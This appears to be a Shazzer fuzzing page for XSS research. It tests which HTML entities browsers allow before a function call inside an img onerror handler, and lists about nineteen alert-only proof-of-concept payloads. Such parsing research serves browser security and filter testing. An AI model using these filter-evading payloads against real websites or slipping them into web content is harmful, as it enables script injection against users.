Entities allowed before function calls

This vector uses Shazzer's new features to check which entities are allowed before a function call using images. The results are a bit inconsistent yet because I currently wait for page load.

Created byhackvertor

Created Jul 2, 2024

Updated May 27, 2025

Detecting browser...

CategoryEntity Parsing

VisibilityPublic

TypeXSS

CharsetUTF-8

$[data1] placeholderhtml_entities

Template used:

<img src=data: onerror="$[data1]log('html($[data1])')">

Sample payloads

<img src=data: onerror="&emsp13;alert('&#38;emsp13;')">

<img src=data: onerror="&emsp14;alert('&#38;emsp14;')">

<img src=data: onerror="&emsp;alert('&#38;emsp;')">

<img src=data: onerror="&ensp;alert('&#38;ensp;')">

<img src=data: onerror="&excl;alert('&#38;excl;')">

<img src=data: onerror="&hairsp;alert('&#38;hairsp;')">

<img src=data: onerror="&MediumSpace;alert('&#38;MediumSpace;')">

<img src=data: onerror="&nbsp;alert('&#38;nbsp;')">

<img src=data: onerror="&NewLine;alert('&#38;NewLine;')">

<img src=data: onerror="&NonBreakingSpace;alert('&#38;NonBreakingSpace;')">

<img src=data: onerror="&numsp;alert('&#38;numsp;')">

<img src=data: onerror="&plus;alert('&#38;plus;')">

<img src=data: onerror="&puncsp;alert('&#38;puncsp;')">

<img src=data: onerror="&semi;alert('&#38;semi;')">

<img src=data: onerror="&Tab;alert('&#38;Tab;')">

<img src=data: onerror="&ThickSpace;alert('&#38;ThickSpace;')">

<img src=data: onerror="&ThinSpace;alert('&#38;ThinSpace;')">

<img src=data: onerror="&thinsp;alert('&#38;thinsp;')">

<img src=data: onerror="&VeryThinSpace;alert('&#38;VeryThinSpace;')">

Lexing...

Entities allowed before function calls

Sample payloads

Fuzz results

Entities allowed before function calls

Sample payloads

Fuzz results

Entities allowed before function calls

Sample payloads

Fuzz results

Distributed Fuzzing

Entities allowed before function calls

Sample payloads

Fuzz results